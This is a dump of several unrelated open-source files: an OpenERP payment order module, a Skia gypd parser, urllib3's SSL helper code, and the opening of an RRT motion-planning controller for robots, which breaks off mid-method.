'mode': fields.many2one('payment.mode', 'Payment Mode', select=True, required=1, states={'done': [('readonly', True)]}, help='Select the Payment Mode to be applied.'),
'state': fields.selection([
('draft', 'Draft'),
('cancel', 'Cancelled'),
('open', 'Confirmed'),
('done', 'Done')], 'Status', select=True, copy=False,
help='When an order is placed the status is \'Draft\'.\n Once the bank is confirmed the status is set to \'Confirmed\'.\n Once the order is paid the status is \'Done\'.'),
'line_ids': fields.one2many('payment.line', 'order_id', 'Payment lines', states={'done': [('readonly', True)]}),
'total': fields.function(_total, string="Total", type='float'),
'user_id': fields.many2one('res.users', 'Responsible', required=True, states={'done': [('readonly', True)]}),
'date_prefered': fields.selection([
('now', 'Directly'),
('due', 'Due date'),
('fixed', 'Fixed date')
], "Preferred Date", change_default=True, required=True, states={'done': [('readonly', True)]}, help="Choose an option for the Payment Order:'Fixed' stands for a date specified by you.'Directly' stands for the direct execution.'Due date' stands for the scheduled date of execution."),
'date_created': fields.date('Creation Date', readonly=True),
'date_done': fields.date('Execution Date', readonly=True),
'company_id': fields.related('mode', 'company_id', type='many2one', relation='res.company', string='Company', store=True, readonly=True),
}
_defaults = {
'user_id': lambda self,cr,uid,context: uid,
'state': 'draft',
'date_prefered': 'due',
'date_created': lambda *a: time.strftime('%Y-%m-%d'),
'reference': lambda self,cr,uid,context: self.pool.get('ir.sequence').next_by_code(cr, uid, 'payment.order'),
}
def set_to_draft(self, cr, uid, ids, *args):
self.write(cr, uid, ids, {'state': 'draft'})
self.create_workflow(cr, uid, ids)
return True
def action_open(self, cr, uid, ids, *args):
ir_seq_obj = self.pool.get('ir.sequence')
for order in self.read(cr, uid, ids, ['reference']):
if not order['reference']:
reference = ir_seq_obj.next_by_code(cr, uid, 'payment.order')
self.write(cr, uid, order['id'], {'reference':reference})
return True
def set_done(self, cr, uid, ids, *args):
self.write(cr, uid, ids, {'date_done': time.strftime('%Y-%m-%d')})
self.signal_workflow(cr, uid, ids, 'done')
return True
def write(self, cr, uid, ids, vals, context=None):
if context is None:
context = {}
payment_line_obj = self.pool.get('payment.line')
payment_line_ids = []
if (vals.get('date_prefered', False) == 'fixed' and not vals.get('date_scheduled', False)) or vals.get('date_scheduled', False):
for order in self.browse(cr, uid, ids, context=context):
for line in order.line_ids:
payment_line_ids.append(line.id)
payment_line_obj.write(cr, uid, payment_line_ids, {'date': vals.get('date_scheduled', False)}, context=context)
elif vals.get('date_prefered', False) == 'due':
vals.update({'date_scheduled': False})
for order in self.browse(cr, uid, ids, context=context):
for line in order.line_ids:
payment_line_obj.write(cr, uid, [line.id], {'date': line.ml_maturity_date}, context=context)
elif vals.get('date_prefered', False) == 'now':
vals.update({'date_scheduled': False})
for order in self.browse(cr, uid, ids, context=context):
for line in order.line_ids:
payment_line_ids.append(line.id)
payment_line_obj.write(cr, uid, payment_line_ids, {'date': False}, context=context)
return super(payment_order, self).write(cr, uid, ids, vals, context=context)
class payment_line(osv.osv):
_name = 'payment.line'
_description = 'Payment Line'
def translate(self, orig):
return {
"due_date": "date_maturity",
"reference": "ref"}.get(orig, orig)
def _info_owner(self, cr, uid, ids, name=None, args=None, context=None):
result = {}
for line in self.browse(cr, uid, ids, context=context):
owner = line.order_id.mode.bank_id.partner_id
result[line.id] = self._get_info_partner(cr, uid, owner, context=context)
return result
def _get_info_partner(self,cr, uid, partner_record, context=None):
if not partner_record:
return False
st = partner_record.street or ''
st1 = partner_record.street2 or ''
zip = partner_record.zip or ''
city = partner_record.city or ''
zip_city = zip + ' ' + city
cntry = partner_record.country_id and partner_record.country_id.name or ''
return partner_record.name + "\n" + st + " " + st1 + "\n" + zip_city + "\n" +cntry
def _info_partner(self, cr, uid, ids, name=None, args=None, context=None):
result = {}
for line in self.browse(cr, uid, ids, context=context):
result[line.id] = False
if not line.partner_id:
continue
result[line.id] = self._get_info_partner(cr, uid, line.partner_id, context=context)
return result
#dead code
def select_by_name(self, cr, uid, ids, name, args, context=None):
if not ids: return {}
partner_obj = self.pool.get('res.partner')
cr.execute("""SELECT pl.id, ml.%s
FROM account_move_line ml
INNER JOIN payment_line pl
ON (ml.id = pl.move_line_id)
WHERE pl.id IN %%s"""% self.translate(name),
(tuple(ids),))
res = dict(cr.fetchall())
if name == 'partner_id':
partner_name = {}
for p_id, p_name in partner_obj.name_get(cr, uid,
filter(lambda x:x and x != 0,res.values()), context=context):
partner_name[p_id] = p_name
for id in ids:
if id in res and partner_name:
res[id] = (res[id],partner_name[res[id]])
else:
res[id] = (False,False)
else:
for id in ids:
res.setdefault(id, (False, ""))
return res
def _amount(self, cursor, user, ids, name, args, context=None):
if not ids:
return {}
currency_obj = self.pool.get('res.currency')
if context is None:
context = {}
res = {}
for line in self.browse(cursor, user, ids, context=context):
ctx = context.copy()
ctx['date'] = line.order_id.date_done or time.strftime('%Y-%m-%d')
res[line.id] = currency_obj.compute(cursor, user, line.currency.id,
line.company_currency.id,
line.amount_currency, context=ctx)
return res
def _get_currency(self, cr, uid, context=None):
user_obj = self.pool.get('res.users')
currency_obj = self.pool.get('res.currency')
user = user_obj.browse(cr, uid, uid, context=context)
if user.company_id:
return user.company_id.currency_id.id
else:
return currency_obj.search(cr, uid, [('rate', '=', 1.0)])[0]
def _get_date(self, cr, uid, context=None):
if context is None:
context = {}
payment_order_obj = self.pool.get('payment.order')
date = False
if context.get('order_id') and context['order_id']:
order = payment_order_obj.browse(cr, uid, context['order_id'], context=context)
if order.date_prefered == 'fixed':
date = order.date_scheduled
else:
date = time.strftime('%Y-%m-%d')
return date
def _get_ml_inv_ref(self, cr, uid, ids, *a):
res = {}
for id in self.browse(cr, uid, ids):
res[id.id] = False
if id.move_line_id:
if id.move_line_id.invoice:
res[id.id] = id.move_line_id.invoice.id
return res
def _get_ml_maturity_date(self, cr, uid, ids, *a):
res = {}
for id in self.browse(cr, uid, ids):
if id.move_line_id:
res[id.id] = id.move_line_id.date_maturity
else:
res[id.id] = False
return res
def _get_ml_created_date(self, cr, uid, ids, *a):
res = {}
for id in self.browse(cr, uid, ids):
if id.move_line_id:
res[id.id] = id.move_line_id.date_created
else:
res[id.id] = False
return res
_columns = {
'name': fields.char('Your Reference', required=True),
'communication': fields.char('Communication', required=True, help="Used as the message between ordering customer and current company. Depicts 'What do you want to say to the recipient about this order?'"),
'communication2': fields.char('Communication 2', help='The successor message of Communication.'),
'move_line_id': fields.many2one('account.move.line', 'Entry line', domain=[('reconcile_id', '=', False), ('account_id.type', '=', 'payable')], help='This Entry Line will be referred for the information of the ordering customer.'),
'amount_currency': fields.float('Amount in Partner Currency', digits=(16, 2),
required=True, help='Payment amount in the partner currency'),
'currency': fields.many2one('res.currency','Partner Currency', required=True),
'company_currency': fields.many2one('res.currency', 'Company Currency', readonly=True),
'bank_id': fields.many2one('res.partner.bank', 'Destination Bank Account'),
'order_id': fields.many2one('payment.order', 'Order', required=True,
ondelete='cascade', select=True),
'partner_id': fields.many2one('res.partner', string="Partner", required=True, help='The Ordering Customer'),
'amount': fields.function(_amount, string='Amount in Company Currency',
type='float',
help='Payment amount in the company currency'),
'ml_date_created': fields.function(_get_ml_created_date, string="Effective Date",
type='date', help="Invoice Effective Date"),
'ml_maturity_date': fields.function(_get_ml_maturity_date, type='date', string='Due Date'),
'ml_inv_ref': fields.function(_get_ml_inv_ref, type='many2one', relation='account.invoice', string='Invoice Ref.'),
'info_owner': fields.function(_info_owner, string="Owner Account", type="text", help='Address of the Main Partner'),
'info_partner': fields.function(_info_partner, string="Destination Account", type="text", help='Address of the Ordering Customer.'),
'date': fields.date('Payment Date', help="If no payment date is specified, the bank will treat this payment line directly"),
'create_date': fields.datetime('Created', readonly=True),
'state': fields.selection([('normal','Free'), ('structured','Structured')], 'Communication Type', required=True),
'bank_statement_line_id': fields.many2one('account.bank.statement.line', 'Bank statement line'),
'company_id': fields.related('order_id', 'company_id', type='many2one', relation='res.company', string='Company', store=True, readonly=True),
}
_defaults = {
'name': lambda obj, cursor, user, context: obj.pool.get('ir.sequence'
).next_by_code(cursor, user, 'payment.line'),
'state': 'normal',
'currency': _get_currency,
'company_currency': _get_currency,
'date': _get_date,
}
_sql_constraints = [
('name_uniq', 'UNIQUE(name)', 'The payment line name must be unique!'),
]
def onchange_move_line(self, cr, uid, ids, move_line_id, payment_type, date_prefered, date_scheduled, currency=False, company_currency=False, context=None):
data = {}
move_line_obj = self.pool.get('account.move.line')
data['amount_currency'] = data['communication'] = data['partner_id'] = data['bank_id'] = data['amount'] = False
if move_line_id:
line = move_line_obj.browse(cr, uid, move_line_id, context=context)
data['amount_currency'] = line.amount_residual_currency
res = self.onchange_amount(cr, uid, ids, data['amount_currency'], currency,
company_currency, context)
if res:
data['amount'] = res['value']['amount']
data['partner_id'] = line.partner_id.id
temp = line.currency_id and line.currency_id.id or False
if not temp:
if line.invoice:
data['currency'] = line.invoice.currency_id.id
else:
data['currency'] = temp
# calling onchange of partner and updating data dictionary
temp_dict = self.onchange_partner(cr, uid, ids, line.partner_id.id, payment_type)
data.update(temp_dict['value'])
data['communication'] = line.ref
if date_prefered == 'now':
#no payment date => immediate payment
data['date'] = False
elif date_prefered == 'due':
data['date'] = line.date_maturity
elif date_prefered == 'fixed':
data['date'] = date_scheduled
return {'value': data}
def onchange_amount(self, cr, uid, ids, amount, currency, cmpny_currency, context=None):
if (not amount) or (not cmpny_currency):
return {'value': {'amount': False}}
res = {}
currency_obj = self.pool.get('res.currency')
company_amount = currency_obj.compute(cr, uid, currency, cmpny_currency, amount)
res['amount'] = company_amount
return {'value': res}
def onchange_partner(self, cr, uid, ids, partner_id, payment_type, context=None):
data = {}
partner_obj = self.pool.get('res.partner')
payment_mode_obj = self.pool.get('payment.mode')
data['info_partner'] = data['bank_id'] = False
if partner_id:
part_obj = partner_obj.browse(cr, uid, partner_id, context=context)
partner = part_obj.name or ''
data['info_partner'] = self._get_info_partner(cr, uid, part_obj, context=context)
if part_obj.bank_ids and payment_type:
bank_type = payment_mode_obj.suitable_bank_types(cr, uid, payment_type, context=context)
for bank in part_obj.bank_ids:
if bank.state in bank_type:
data['bank_id'] = bank.id
break
return {'value': data}
def fields_get(self, cr, uid, fields=None, context=None, write_access=True, attributes=None):
res = super(payment_line, self).fields_get(cr, uid, fields, context, write_access, attributes)
if 'communication2' in res:
res['communication2'].setdefault('states', {})
res['communication2']['states']['structured'] = [('readonly', True)]
res['communication2']['states']['normal'] = [('readonly', False)]
return res
|
agpl-3.0
|
RadonX-ROM/external_skia
|
platform_tools/android/gyp_gen/gypd_parser.py
|
144
|
5764
|
#!/usr/bin/python
# Copyright 2014 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Functions for parsing the gypd output from gyp.
"""
import os
def parse_dictionary(var_dict, d, current_target_name, dest_dir):
"""Helper function to get the meaningful entries in a dictionary.
Parse dictionary d, and store unique relevant entries in var_dict.
Recursively parses internal dictionaries and files that are referenced.
When parsing the 'libraries' list from gyp, entries in the form
'-l<name>' get assigned to var_dict.LOCAL_SHARED_LIBRARIES as 'lib<name>',
and entries in the form '[lib]<name>.a' get assigned to
var_dict.LOCAL_STATIC_LIBRARIES as 'lib<name>'.
Args:
var_dict: VarsDict object for storing the results of the parsing.
d: Dictionary object to parse.
current_target_name: The current target being parsed. If this dictionary
is a target, this will be its entry 'target_name'. Otherwise, this will
be the name of the target which contains this dictionary.
dest_dir: Destination for the eventual Android.mk that will be created from
this parse, relative to Skia trunk. Used to determine path for source
files.
"""
for source in d.get('sources', []):
# Compare against a lowercase version, in case files are named .H or .GYPI
lowercase_source = source.lower()
if lowercase_source.endswith('.h'):
# Android.mk does not need the header files.
continue
if lowercase_source.endswith('gypi'):
# The gypi files are included in sources, but the sources they included
# are also included. No need to parse them again.
continue
# The path is relative to the gyp folder, but Android wants the path
# relative to dest_dir.
rel_source = os.path.relpath(source, os.pardir)
rel_source = os.path.relpath(rel_source, dest_dir)
var_dict.LOCAL_SRC_FILES.add(rel_source)
for lib in d.get('libraries', []):
if lib.endswith('.a'):
# Remove the '.a'
lib = lib[:-2]
# Add 'lib', if necessary
if not lib.startswith('lib'):
lib = 'lib' + lib
var_dict.LOCAL_STATIC_LIBRARIES.add(lib)
else:
# lib will be in the form of '-l<name>'. Change it to 'lib<name>'
lib = lib.replace('-l', 'lib', 1)
var_dict.LOCAL_SHARED_LIBRARIES.add(lib)
for dependency in d.get('dependencies', []):
# Each dependency is listed as
# <path_to_file>:<target>#target
li = dependency.split(':')
assert(len(li) <= 2 and len(li) >= 1)
sub_targets = []
if len(li) == 2 and li[1] != '*':
sub_targets.append(li[1].split('#')[0])
sub_path = li[0]
assert(sub_path.endswith('.gyp'))
# Although the original reference is to a .gyp, parse the corresponding
# gypd file, which was constructed by gyp.
sub_path = sub_path + 'd'
parse_gypd(var_dict, sub_path, dest_dir, sub_targets)
if 'default_configuration' in d:
config_name = d['default_configuration']
# default_configuration is meaningless without configurations
assert('configurations' in d)
config = d['configurations'][config_name]
parse_dictionary(var_dict, config, current_target_name, dest_dir)
for flag in d.get('cflags', []):
var_dict.LOCAL_CFLAGS.add(flag)
for flag in d.get('cflags_cc', []):
var_dict.LOCAL_CPPFLAGS.add(flag)
for include in d.get('include_dirs', []):
if include.startswith('external'):
# This path is relative to the Android root. Leave it alone.
rel_include = include
else:
# As with source, the input path will be relative to gyp/, but Android
# wants relative to dest_dir.
rel_include = os.path.relpath(include, os.pardir)
rel_include = os.path.relpath(rel_include, dest_dir)
# No need to include the base directory.
if rel_include == os.curdir:
continue
rel_include = os.path.join('$(LOCAL_PATH)', rel_include)
# Remove a trailing slash, if present.
if rel_include.endswith('/'):
rel_include = rel_include[:-1]
var_dict.LOCAL_C_INCLUDES.add(rel_include)
# For the top level, libskia, include directories should be exported.
# FIXME (scroggo): Do not hard code this.
if current_target_name == 'libskia':
var_dict.LOCAL_EXPORT_C_INCLUDE_DIRS.add(rel_include)
for define in d.get('defines', []):
var_dict.DEFINES.add(define)
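# Illustrative sketch (not part of the original tool): the library-name
# normalization described in the parse_dictionary docstring, on its own.
# '-l<name>' entries become shared 'lib<name>', '<name>.a' entries become
# static 'lib<name>'.
def _normalize_gyp_library(lib):
    if lib.endswith('.a'):
        lib = lib[:-2]
        if not lib.startswith('lib'):
            lib = 'lib' + lib
        return ('static', lib)
    return ('shared', lib.replace('-l', 'lib', 1))
# _normalize_gyp_library('-lskia') -> ('shared', 'libskia')
# _normalize_gyp_library('protobuf.a') -> ('static', 'libprotobuf')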
def parse_gypd(var_dict, path, dest_dir, desired_targets=None):
"""Parse a gypd file.
Open a file that consists of python dictionaries representing build targets.
Parse those dictionaries using parse_dictionary. Recursively parses
referenced files.
Args:
var_dict: VarsDict object for storing the result of the parse.
path: Path to gypd file.
dest_dir: Destination for the eventual Android.mk that will be created from
this parse, relative to Skia trunk. Used to determine path for source
files and include directories.
desired_targets: List of targets to be parsed from this file. If empty,
parse all targets.
"""
d = {}
with open(path, 'r') as f:
# Read the entire file as a dictionary
d = eval(f.read())
# The gypd file is structured such that the top level dictionary has an entry
# named 'targets'
for target in d['targets']:
target_name = target['target_name']
if target_name in var_dict.KNOWN_TARGETS:
# Avoid circular dependencies
continue
if desired_targets and target_name not in desired_targets:
# Our caller does not depend on this one
continue
# Add it to our known targets so we don't parse it again
var_dict.KNOWN_TARGETS.add(target_name)
parse_dictionary(var_dict, target, target_name, dest_dir)
|
bsd-3-clause
|
hrishioa/Navo
|
Raspi-Code/Lib/venv/lib/python2.7/site-packages/pip/_vendor/requests/packages/urllib3/util/ssl_.py
|
484
|
10037
|
from binascii import hexlify, unhexlify
from hashlib import md5, sha1, sha256
from ..exceptions import SSLError, InsecurePlatformWarning
SSLContext = None
HAS_SNI = False
create_default_context = None
import errno
import warnings
try: # Test for SSL features
import ssl
from ssl import wrap_socket, CERT_NONE, PROTOCOL_SSLv23
from ssl import HAS_SNI # Has SNI?
except ImportError:
pass
try:
from ssl import OP_NO_SSLv2, OP_NO_SSLv3, OP_NO_COMPRESSION
except ImportError:
OP_NO_SSLv2, OP_NO_SSLv3 = 0x1000000, 0x2000000
OP_NO_COMPRESSION = 0x20000
# A secure default.
# Sources for more information on TLS ciphers:
#
# - https://wiki.mozilla.org/Security/Server_Side_TLS
# - https://www.ssllabs.com/projects/best-practices/index.html
# - https://hynek.me/articles/hardening-your-web-servers-ssl-ciphers/
#
# The general intent is:
# - Prefer cipher suites that offer perfect forward secrecy (DHE/ECDHE),
# - prefer ECDHE over DHE for better performance,
# - prefer any AES-GCM over any AES-CBC for better performance and security,
# - use 3DES as fallback which is secure but slow,
# - disable NULL authentication, MD5 MACs and DSS for security reasons.
DEFAULT_CIPHERS = (
'ECDH+AESGCM:DH+AESGCM:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:ECDH+HIGH:'
'DH+HIGH:ECDH+3DES:DH+3DES:RSA+AESGCM:RSA+AES:RSA+HIGH:RSA+3DES:!aNULL:'
'!eNULL:!MD5'
)
try:
from ssl import SSLContext # Modern SSL?
except ImportError:
import sys
class SSLContext(object): # Platform-specific: Python 2 & 3.1
supports_set_ciphers = ((2, 7) <= sys.version_info < (3,) or
(3, 2) <= sys.version_info)
def __init__(self, protocol_version):
self.protocol = protocol_version
# Use default values from a real SSLContext
self.check_hostname = False
self.verify_mode = ssl.CERT_NONE
self.ca_certs = None
self.options = 0
self.certfile = None
self.keyfile = None
self.ciphers = None
def load_cert_chain(self, certfile, keyfile):
self.certfile = certfile
self.keyfile = keyfile
def load_verify_locations(self, location):
self.ca_certs = location
def set_ciphers(self, cipher_suite):
if not self.supports_set_ciphers:
raise TypeError(
'Your version of Python does not support setting '
'a custom cipher suite. Please upgrade to Python '
'2.7, 3.2, or later if you need this functionality.'
)
self.ciphers = cipher_suite
def wrap_socket(self, socket, server_hostname=None):
warnings.warn(
'A true SSLContext object is not available. This prevents '
'urllib3 from configuring SSL appropriately and may cause '
'certain SSL connections to fail. For more information, see '
'https://urllib3.readthedocs.org/en/latest/security.html'
'#insecureplatformwarning.',
InsecurePlatformWarning
)
kwargs = {
'keyfile': self.keyfile,
'certfile': self.certfile,
'ca_certs': self.ca_certs,
'cert_reqs': self.verify_mode,
'ssl_version': self.protocol,
}
if self.supports_set_ciphers: # Platform-specific: Python 2.7+
return wrap_socket(socket, ciphers=self.ciphers, **kwargs)
else: # Platform-specific: Python 2.6
return wrap_socket(socket, **kwargs)
def assert_fingerprint(cert, fingerprint):
"""
Checks if given fingerprint matches the supplied certificate.
:param cert:
Certificate as bytes object.
:param fingerprint:
Fingerprint as string of hexdigits, can be interspersed by colons.
"""
# Maps the length of a digest to a possible hash function producing
# this digest.
hashfunc_map = {
16: md5,
20: sha1,
32: sha256,
}
fingerprint = fingerprint.replace(':', '').lower()
digest_length, odd = divmod(len(fingerprint), 2)
if odd or digest_length not in hashfunc_map:
raise SSLError('Fingerprint is of invalid length.')
# We need encode() here for py32; works on py2 and py33.
fingerprint_bytes = unhexlify(fingerprint.encode())
hashfunc = hashfunc_map[digest_length]
cert_digest = hashfunc(cert).digest()
if not cert_digest == fingerprint_bytes:
raise SSLError('Fingerprints did not match. Expected "{0}", got "{1}".'
.format(hexlify(fingerprint_bytes),
hexlify(cert_digest)))
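def _fingerprint_demo():
    """Illustrative helper, not part of urllib3. assert_fingerprint hashes the
    raw bytes it is given (it never parses the certificate), so any byte
    string demonstrates the check; the digest length picks the hash function
    (16 bytes -> md5, 20 -> sha1, 32 -> sha256)."""
    demo_cert = b'dummy certificate bytes'
    assert_fingerprint(demo_cert, sha256(demo_cert).hexdigest())  # matches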
def resolve_cert_reqs(candidate):
"""
Resolves the argument to a numeric constant, which can be passed to
the wrap_socket function/method from the ssl module.
Defaults to :data:`ssl.CERT_NONE`.
If given a string it is assumed to be the name of the constant in the
:mod:`ssl` module or its abbreviation.
(So you can specify `REQUIRED` instead of `CERT_REQUIRED`.)
If it's neither `None` nor a string we assume it is already the numeric
constant which can directly be passed to wrap_socket.
"""
if candidate is None:
return CERT_NONE
if isinstance(candidate, str):
res = getattr(ssl, candidate, None)
if res is None:
res = getattr(ssl, 'CERT_' + candidate)
return res
return candidate
def resolve_ssl_version(candidate):
"""
Like resolve_cert_reqs, resolves the argument to the corresponding numeric
``ssl.PROTOCOL_*`` constant; defaults to :data:`ssl.PROTOCOL_SSLv23`.
"""
if candidate is None:
return PROTOCOL_SSLv23
if isinstance(candidate, str):
res = getattr(ssl, candidate, None)
if res is None:
res = getattr(ssl, 'PROTOCOL_' + candidate)
return res
return candidate
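def _resolver_demo():
    """Illustrative helper, not part of urllib3: the two resolvers above
    accept either the full ssl constant name or the bare suffix."""
    assert resolve_cert_reqs(None) == CERT_NONE
    assert resolve_cert_reqs('REQUIRED') == ssl.CERT_REQUIRED
    assert resolve_ssl_version('SSLv23') == ssl.PROTOCOL_SSLv23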
def create_urllib3_context(ssl_version=None, cert_reqs=None,
options=None, ciphers=None):
"""All arguments have the same meaning as ``ssl_wrap_socket``.
By default, this function does a lot of the same work that
``ssl.create_default_context`` does on Python 3.4+. It:
- Disables SSLv2, SSLv3, and compression
- Sets a restricted set of server ciphers
If you wish to enable SSLv3, you can do::
from urllib3.util import ssl_
context = ssl_.create_urllib3_context()
context.options &= ~ssl_.OP_NO_SSLv3
You can do the same to enable compression (substituting ``COMPRESSION``
for ``SSLv3`` in the last line above).
:param ssl_version:
The desired protocol version to use. This will default to
PROTOCOL_SSLv23 which will negotiate the highest protocol that both
the server and your installation of OpenSSL support.
:param cert_reqs:
Whether to require the certificate verification. This defaults to
``ssl.CERT_REQUIRED``.
:param options:
Specific OpenSSL options. These default to ``ssl.OP_NO_SSLv2``,
``ssl.OP_NO_SSLv3``, ``ssl.OP_NO_COMPRESSION``.
:param ciphers:
Which cipher suites to allow the server to select.
:returns:
Constructed SSLContext object with specified options
:rtype: SSLContext
"""
context = SSLContext(ssl_version or ssl.PROTOCOL_SSLv23)
# Setting the default here, as we may have no ssl module on import
cert_reqs = ssl.CERT_REQUIRED if cert_reqs is None else cert_reqs
if options is None:
options = 0
# SSLv2 is easily broken and is considered harmful and dangerous
options |= OP_NO_SSLv2
# SSLv3 has several problems and is now dangerous
options |= OP_NO_SSLv3
# Disable compression to prevent CRIME attacks for OpenSSL 1.0+
# (issue #309)
options |= OP_NO_COMPRESSION
context.options |= options
if getattr(context, 'supports_set_ciphers', True): # Platform-specific: Python 2.6
context.set_ciphers(ciphers or DEFAULT_CIPHERS)
context.verify_mode = cert_reqs
if getattr(context, 'check_hostname', None) is not None: # Platform-specific: Python 3.2
# We do our own verification, including fingerprints and alternative
# hostnames. So disable it here
context.check_hostname = False
return context
def ssl_wrap_socket(sock, keyfile=None, certfile=None, cert_reqs=None,
ca_certs=None, server_hostname=None,
ssl_version=None, ciphers=None, ssl_context=None):
"""
All arguments except for server_hostname and ssl_context have the same
meaning as they do when using :func:`ssl.wrap_socket`.
:param server_hostname:
When SNI is supported, the expected hostname of the certificate
:param ssl_context:
A pre-made :class:`SSLContext` object. If none is provided, one will
be created using :func:`create_urllib3_context`.
:param ciphers:
A string of ciphers we wish the client to support. This is not
supported on Python 2.6 as the ssl module does not support it.
"""
context = ssl_context
if context is None:
context = create_urllib3_context(ssl_version, cert_reqs,
ciphers=ciphers)
if ca_certs:
try:
context.load_verify_locations(ca_certs)
except IOError as e: # Platform-specific: Python 2.6, 2.7, 3.2
raise SSLError(e)
# Py33 raises FileNotFoundError which subclasses OSError
# These are not equivalent unless we check the errno attribute
except OSError as e: # Platform-specific: Python 3.3 and beyond
if e.errno == errno.ENOENT:
raise SSLError(e)
raise
if certfile:
context.load_cert_chain(certfile, keyfile)
if HAS_SNI: # Platform-specific: OpenSSL with enabled SNI
return context.wrap_socket(sock, server_hostname=server_hostname)
return context.wrap_socket(sock)
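def _ssl_wrap_socket_demo(hostname='example.org'):
    """Illustrative helper, not part of urllib3 (assumes outbound network
    access to the hypothetical host). Wraps a plain TCP socket using the
    hardened defaults above. Verification is relaxed to CERT_NONE purely for
    the sketch; real callers should keep CERT_REQUIRED and pass ca_certs."""
    import socket
    sock = socket.create_connection((hostname, 443))
    try:
        wrapped = ssl_wrap_socket(sock, cert_reqs=ssl.CERT_NONE,
                                  server_hostname=hostname)
        wrapped.close()
    finally:
        sock.close()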
|
gpl-2.0
|
jadecastro/LTLMoP
|
src/lib/handlers/motionControl/RRTController.py
|
1
|
37133
|
#!/usr/bin/env python
"""
===================================================================
RRTController.py - Rapidly-Exploring Random Trees Motion Controller
===================================================================
Uses Rapidly-exploring Random Tree Algorithm to generate paths given the starting position and the goal point.
"""
from numpy import *
from __is_inside import *
import math
import sys,os
from scipy.linalg import norm
from numpy.matlib import zeros
import __is_inside
import time, sys,os
import scipy as Sci
import scipy.linalg
import Polygon, Polygon.IO
import Polygon.Utils as PolyUtils
import Polygon.Shapes as PolyShapes
from math import sqrt, fabs , pi
import random
import thread
import threading
# importing matplotlib to show the path if possible
try:
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import_matplotlib = True
except:
print "matplotlib is not imported. Plotting is disabled"
import_matplotlib = False
class motionControlHandler:
def __init__(self, proj, shared_data,robot_type,max_angle_goal,max_angle_overlap,plotting):
"""
Rapidly-Exploring Random Trees algorithm motion planning controller
robot_type (int): Which robot is used for execution. BasicSim is 1, ODE is 2, ROS is 3, Nao is 4, Pioneer is 5 (default=1)
max_angle_goal (float): The biggest difference in angle between the new node and the goal point that is acceptable. If it is bigger than the max_angle, the new node will not be connected to the goal point. The value should be within 0 to 6.28 = 2*pi. Default set to 6.28 = 2*pi (default=6.28)
max_angle_overlap (float): difference in angle allowed for two nodes overlapping each other. If you don't want any node overlapping with each other, put in 2*pi = 6.28. Default set to 1.57 = pi/2 (default=1.57)
plotting (bool): Check the box to enable plotting. Uncheck to disable plotting (default=True)
"""
self.system_print = False # for debugging. print on GUI ( a bunch of stuffs)
self.finish_print = False # set to 1 to print the original finished E and V before trimming the tree
self.orientation_print = False # show the orientation information of the robot
# Get references to handlers we'll need to communicate with
self.drive_handler = proj.h_instance['drive']
self.pose_handler = proj.h_instance['pose']
# Get information about regions
self.proj = proj
self.coordmap_map2lab = proj.coordmap_map2lab
self.coordmap_lab2map = proj.coordmap_lab2map
self.last_warning = 0
self.previous_next_reg = None
# Store the Rapidly-Exploring Random Tress Built
self.RRT_V = None # array containing all the points on the RRT Tree
self.RRT_E = None # array specifying the connection of points on the Tree
self.E_current_column = None # the current column on the tree (to find the current heading point)
self.Velocity = None
self.currentRegionPoly = None
self.nextRegionPoly = None
self.map = {}
self.all = Polygon.Polygon()
self.trans_matrix = mat([[0,1],[-1,0]]) # transformation matrix for finding the normal to the vector
self.stuck_thres = 20 # threshold for changing the range of sampling omega
# Information about the robot (default set to ODE)
if robot_type not in [1,2,3,4,5]:
robot_type = 1
self.system = robot_type
# Information about maximum turning angle allowed from the latest node to the goal point
if max_angle_goal > 2*pi:
max_angle_goal = 2*pi
if max_angle_goal < 0:
max_angle_goal = 0
self.max_angle_allowed = max_angle_goal
# Information about maximum difference in angle allowed between two overlapping nodes
if max_angle_overlap > 2*pi:
max_angle_overlap = 2*pi
if max_angle_overlap < 0:
max_angle_overlap = 0
self.max_angle_overlap = max_angle_overlap
# Information about whether plotting is enabled.
if plotting is True and import_matplotlib == True:
self.plotting = True
else:
self.plotting = False
# Specify the size of the robot
# 1: basicSim; 2: ODE; 3: ROS 4: Nao; 5: Pioneer
# self.radius: radius of the robot
# self.timestep : number of linear segments to break the curve into for calculation of x, y position
# self.step_size : the length of each step for connection to goal point
# self.velocity : Velocity of the robot in m/s in control space (m/s)
if self.system == 1:
self.radius = 5
self.step_size = 25
self.timeStep = 10
self.velocity = 2 # 1.5
if self.system == 2:
self.radius = 5
self.step_size = 15
self.timeStep = 10
self.velocity = 2 # 1.5
elif self.system == 3:
self.ROSInitHandler = shared_data['ROS_INIT_HANDLER']
self.radius = self.ROSInitHandler.robotPhysicalWidth/2
self.step_size = self.radius*3 #0.2
self.timeStep = 8
self.velocity = self.radius/2 #0.08
elif self.system == 4:
self.radius = 0.15*1.2
self.step_size = 0.2 #set the step_size for points be 1/5 of the norm ORIGINAL = 0.4
self.timeStep = 5
self.velocity = 0.05
elif self.system == 5:
self.radius = 0.15
self.step_size = 0.2 #set the step_size for points be 1/5 of the norm ORIGINAL = 0.4
self.timeStep = 5
self.velocity = 0.05
# Operate_system (int): Which operating system is used for execution.
# Ubuntu and Mac is 1, Windows is 2
if sys.platform in ['win32', 'cygwin']:
self.operate_system = 2
else:
self.operate_system = 1
if self.system_print == True:
print "The operate_system is "+ str(self.operate_system)
# Generate polygon for regions in the map
for region in self.proj.rfi.regions:
self.map[region.name] = self.createRegionPolygon(region)
for n in range(len(region.holeList)): # no of holes
self.map[region.name] -= self.createRegionPolygon(region,n)
# Generate the boundary polygon
for regionName,regionPoly in self.map.iteritems():
self.all += regionPoly
# Start plotting if operating in Windows
if self.operate_system == 2 and self.plotting ==True:
# start using animation to plot the robot
self.fig = plt.figure()
self.ax = self.fig.add_subplot(111)
self.scope = _Scope(self.ax,self)
thread.start_new_thread(self.jplot,())
def gotoRegion(self, current_reg, next_reg, last=False):
"""
If ``last`` is True, we will move to the center of the destination region.
Returns ``True`` if we've reached the destination region.
"""
if current_reg == next_reg and not last:
# No need to move!
self.drive_handler.setVelocity(0, 0) # So let's stop
return True
# Find our current configuration
pose = self.pose_handler.getPose()
# Check if Vicon has cut out
# TODO: this should probably go in posehandler?
if math.isnan(pose[2]):
print "WARNING: No Vicon data! Pausing."
self.drive_handler.setVelocity(0, 0) # So let's stop
time.sleep(1)
return False
###This part will be run when the robot goes to a new region, otherwise, the original tree will be used.
if not self.previous_next_reg == next_reg:
# Entered a new region. New tree should be formed.
